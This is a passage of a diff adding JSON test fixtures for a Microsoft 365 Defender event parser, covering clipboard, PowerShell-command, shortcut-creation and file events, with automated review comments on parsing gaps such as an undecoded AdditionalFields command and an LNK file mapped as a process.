office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": 
"device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "CommandLine": "\"OUTLOOK.EXE\" ", + "FileSize": 44152968, + "LogonId": "389220681", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Outlook", + "VersionInfoInternalFileName": "Outlook", + "VersionInfoOriginalFileName": "Outlook.exe", + "VersionInfoProductName": "Microsoft Outlook", + "VersionInfoProductVersion": "16.0.17928.20216" + } + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..ea0ddb0df --- /dev/null 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json 
@@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "CommandLine": "powershell.exe", + 
"FileSize": 450560, + "LogonId": "398124703", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows PowerShell", + "VersionInfoInternalFileName": "POWERSHELL", + "VersionInfoOriginalFileName": "PowerShell.EXE", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.3085" + } + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..37a646715 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json 
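Review bot: The `AdditionalFields` value in this fixture is a JSON string carrying `{"Command":"nslookup.exe user01-domain.USER01.local 1.2.3.4"}`, i.e. the PowerShell command that was actually executed, and nothing in the expected output surfaces it — `process.command_line` holds only `powershell.exe`, the host shell. For a `PowerShellCommand` event that command is the one field an analyst or a detection rule needs, so the parser should JSON-decode `AdditionalFields` (it arrives as a string, not an object) and map `Command` to a searchable field; the parser stage that would do this is outside this patch, so this note only flags the gap the fixture makes visible. `AdditionalFields` in `test_device_events_shell_link_create_file.json` is likewise a JSON string (`FileSizeInBytes`, `ShellLinkRunAsAdmin`, `ShellLinkShowCommand`, …), so one generic decode step on that field would serve both event types.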
@@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}",
+ "event": {
+ "category": [
+ "host"
+ ],
+ "dataset": "device_events",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-12T10:17:23.330722Z",
+ "action": {
+ "properties": {
+ "process": {
+ "parent": {
+ "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+ "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+ "FileSize": 1621656,
+ "LogonId": "8066492",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft Word",
+ "VersionInfoInternalFileName": "WinWord",
+ "VersionInfoOriginalFileName": "WinWord.exe",
+ "VersionInfoProductName": "Microsoft Office",
+ "VersionInfoProductVersion": "16.0.17928.20216"
+ }
+ }
+ },
+ "type": "ShellLinkCreateFileEvent"
+ },
+ "file": {
+ "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent",
+ "hash": {
+ "md5": "5d5608654828cf052ba013b3c37cbb61",
+ "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e",
+ "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+ },
+ "name": "FILENAME.LNK"
+ },
+ "host": {
+ "id": "abcdef0123456789",
+ "name": "user.company.local"
+ },
+ "microsoft": {
+ "defender": {
+ "report": {
+ "id": "22722"
+ }
+ }
+ },
+ "process": {
+ "name": "FILENAME.LNK",
+ "parent": {
+ "args": [
+ "\"\"",
+ "\"I:\\COMPANY\\Service\\FILE.doc\"",
+ "/n",
+ "/o"
+ ],
+ "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+ "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe",
+ "hash": {
+ "md5": 
"51a9cac9c4e8da44ffd7502be17604ee",
+ "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+ "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+ },
+ "name": "winword.exe",
+ "pid": 20948,
+ "start": "2024-11-12T10:02:28.777910Z",
+ "user": {
+ "domain": "company",
+ "email": "JOHNDOE@COMPANY.COM",
+ "id": "S-1-2-3",
+ "name": "jdoe"
+ },
+ "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16"
+ },
+ "start": "2024-11-06T16:05:23.113802Z",
+ "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office"
+ },
+ "related": {
+ "hash": [
+ "44543e0c6f30415c670c1322e61ca68602d58708",
+ "51a9cac9c4e8da44ffd7502be17604ee",
+ "5d5608654828cf052ba013b3c37cbb61",
+ "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+ "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232",
+ "f1d50e0d3e0ba197baf152614e0cd94487a1142e"
+ ]
+ }
+ }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
index 7428190cf..94b70858f 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
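Review bot: The expected document turns the created shortcut into a process — `"process": { "name": "FILENAME.LNK", ... "start": "2024-11-06T16:05:23.113802Z" }` is filled from `FileName`/`ProcessCreationTime` although `ProcessId` and `ProcessCommandLine` are null in the input — so any detection keyed on `process.name` or `process.start` would fire on an `.LNK` file being written rather than on anything executing. The fields that actually matter for LNK-based initial-access hunting, `ShellLinkRunAsAdmin`, `ShellLinkShowCommand` and `IsOnRemovableMedia`, are present in `AdditionalFields` but nothing in `expected` pins them; if the parser decodes `AdditionalFields` they should be asserted (for example under `action.properties`), and if it does not, that gap is worth a follow-up. Note also that `process.working_directory` is `FolderPath` with its last component stripped while `file.directory` is `FolderPath` unchanged, so the fixture freezes two contradictory readings of whether `FolderPath` already names the folder. The parser is outside this diff, so these points are inferred from the expected document only.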
@@ -16,17 +16,19 @@
 "@timestamp": "2022-09-01T07:46:42.468408Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
- "InitiatingProcessFileSize": 56824728,
- "InitiatingProcessIntegrityLevel": "Medium",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
- "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe",
- "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive",
- "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
+ "FileSize": 56824728,
+ "IntegrityLevel": "Medium",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
+ "VersionInfoInternalFileName": "OneDriveSetup.exe",
+ "VersionInfoOriginalFileName": "OneDriveSetup.exe",
+ "VersionInfoProductName": "Microsoft OneDrive",
+ "VersionInfoProductVersion": "22.166.0807.0002"
+ }
 },
 "type": "FileDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
new file mode 100644
index 000000000..1a9daafcd
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json 
@@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account 